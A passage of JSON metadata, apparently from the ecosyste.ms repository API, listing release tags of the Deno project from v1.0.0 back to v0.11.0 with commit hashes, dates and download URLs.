repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-